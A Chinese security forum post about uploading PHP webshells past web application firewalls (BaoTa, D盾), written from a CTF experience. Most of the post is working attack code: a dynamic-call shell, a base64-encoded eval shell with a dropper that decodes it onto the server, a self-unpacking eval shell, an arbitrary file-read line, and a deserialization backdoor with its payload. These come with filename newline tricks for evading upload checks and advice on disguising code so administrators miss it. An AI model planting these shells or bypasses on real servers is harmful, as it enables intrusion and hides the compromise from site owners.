安全矩阵

 找回密码
 立即注册
搜索
查看: 4434|回复: 0

绕过waf的另类木马文件攻击方法

[复制链接]

991

主题

1063

帖子

4315

积分

论坛元老

Rank: 8Rank: 8

积分
4315
发表于 2020-10-17 20:36:04 | 显示全部楼层 |阅读模式
原文链接:绕过waf的另类木马文件攻击方法

很久没写文章了,继上次发先文章到今天已经很久了;很久没写文章了,继上次发先文章到今天已经很久了;今天突发异想;因为之前打了西湖论剑,遇到了宝塔的waf,最后也是过去了,便觉得另类的攻击方法值得写篇文章分享下;首先我打算分享几种。

一:动态调用      

首先,一些waf会对文件内容进行检索,如果发现有什么危险的函数,或者有什么危害的逻辑,都会进行拦击,所以我们不能写入一些危险的函数,否则就会被ban掉,其实在实际的攻击中,也是存在和这次论剑web1一样的绕过方式,在我们真正恶意代码前加入大量杂糅字符进行绕过;然后对后缀进行换行绕过;

那么就会存在此次web1的动态调用解法;
写入<?php $_GET['0']($_GET['1']);?>我们在上传的文件中并没有出现什么危险的函数,而是通过后期的get传入进行动态调用从而执行命令;这样就会绕过上传时waf的检测;但是绕不过disable_function;;
载荷效果如下:


二:利用.htaccess文件

对于利用.htaccess文件的攻击方法,其实有很多方法;包括自我包含造成后门,或者auto_prepend_file文件,或者自定义报错目录然后利用包含报错写入木马最后自定义包含,AddType等等。当然如果想搞怪的话,也是可以利用.htaccess打出存储型xss的效果;但是这里主题分享如果过滤了内容中的一些敏感字符应如何。
比如过滤了<? 或者 <  ;这里也是老方法了;之前也写过,利用.htaccess进行编码的转化,base64或者UTF-7都可;我们只需要将木马文件进行相应的编码即可;这种方法可以绕过waf的检测,但是也是绕不过 disable_function;
三:利用文件修改文件造成木马

这种方式也确实值得分享,也是基于waf对我们的木马内容进行过滤;当我们无法上传带有危险函数的木马时;可以使用文件篡改文件的方法;这种方法基于第二种方法.htaccess无法传入的时候;
比如:先传入PD9waHAgZXZhbCgkX1BPU1RbJ2EnXSk7Pz4=命名为1.php;这里我们上传时waf自然不会检测到,因为我们确实没有危险函数;然后再次传入第二个没有高度危险函数的2.php代码:
  1. <?php

  2. $path ="/xx/xxx/xx/1.php";

  3. $str= file_get_contents($path);

  4. $strs = base64_decode($str);

  5. $s1mple = fopen("./s1mple.php","w");

  6. fwrite($s1mple,$strs);
  7. fclose($s1mple);
  8. ?>
复制代码

代码逻辑简单,将我们的文件,进行了base64解密,然后写入的一个新的php文件中,这样避免了file_put_contents这个极大概率被ban的函数的出现,又成功的写入了文件,我们访问2.php,然后再访问s1mple.php就可以拿到shell;载荷效果如下:




四:利用低危木马;
基于第三种方法,我们如果不是拿权限的话,也是可以利用一些低危的操作,比如任意文件读取等等;
下面先来看这段getshell的代码
  1. <?php
  2. $s1mple = file_get_contents(__FILE__);
  3. eval(str_replace("<?php","",str_replace("//","",$s1mple)));
  4. //eval($_GET['a']);
  5. ?>
复制代码

这段代码在之前可以绕过D盾,是基于注释的绕过;现在不确定还能否绕过;简单分析下逻辑;首先$s1mple得到本篇代码的所有内容;然后执行一个替换的语句;先释放出木马语句;然后再将php头换掉,保持了原本的php头;这样就释放出了木马,就可以通过get传参进行命令执行;

或者换种方法,这里我们可以直接file_get_contents函数进行攻击,
  1. <?php echo file_get_contents($_GET['a']);?>
复制代码
这样也就可以达到任意文件读取,当然,因为php的特性,也可以对file_get_contents进行各种处理,使其绕过waf;也可以结合其他php的内置函数进行攻击,可以类比;这里不在细说;

五:利用逻辑问题
这种思想比较新颖;简单来说,我们并不是传入恶意代码,而是传入一段正常的代码,然后通过逻辑修改其运作走向,从而达到恶意执行,那么适合的就是pop链的构造了;

  1. <?php
  2. error_reporting(0);
  3. class s1mple{
  4.   public $A;
  5.   function __construct(){
  6.     $this->A=new hacker();
  7.   }
  8.   function __destruct(){
  9.     $this->A->action();
  10.   }
  11. }
  12. class hacker{
  13.   function action(){
  14.     echo "hello_hacker";
  15.   }
  16. }
  17. class evil{
  18.   public $data;
  19.   function action(){
  20.     eval($this->data);
  21.   }
  22. }
  23. unserialize($_GET['a']);
复制代码
先来看正常的代码;这段代码中我们按照正常的逻辑分析,肯定是没有问题的;但是我们可以利用逻辑,改变其执行的走向从而进行对象注入达到攻击;
  1. O:6:"s1mple":1:{s:1:"A";O:4:"evil":1:{s:4:"data";s:10:"phpinfo();";}}
复制代码

在我们一般的上传中,往往是图片,就单代码而言,其大小是微乎其微的;所以在实战中也可用到;而且很难被检测到;当然,这只是一种方式,也可以结合回调函数和其他的函数,可以将其隐藏起来,然后利用pop触发;而且如果代码伪造的合适的话,也是可以骗过管理员从而避免被管理员删除的;

六:利用过宝塔waf思路另辟蹊径绕过waf

宝塔的waf对于文件明后缀的检测,是可以通过换行进行绕过的;就譬如我们在例子一中说的那样,那么我们除了对于我们后缀进行换行绕过,我们也可以考虑对我们的filename做手脚;对filename做换行,也可以绕过;


以上这些方法也算是新式方法,当然也可以考虑异或或者自增的木马,也可以通过混淆进行攻击,都可;但是实际中这些往往会被检测,上述的几种方法都是测试后可绕过D盾或者绕过宝塔的方法,供参考;另外一些方法需要可以首先绕过上传对后缀的检测,比如可以换行绕过宝塔对后缀的检测;如果可以上传php,那么以上方法即可任意发挥攻击。


相关实验:WAF渗透攻防实践
https://www.hetianlab.com/expc.d ... 2017110811103300001
通过该实验了解基于规则的WAF的工作原理,通过分析相关防御规则,尝试使用多种方法进行绕过,使读者直观感受攻防双方的博弈过程。


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 08:47 , Processed in 0.012531 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表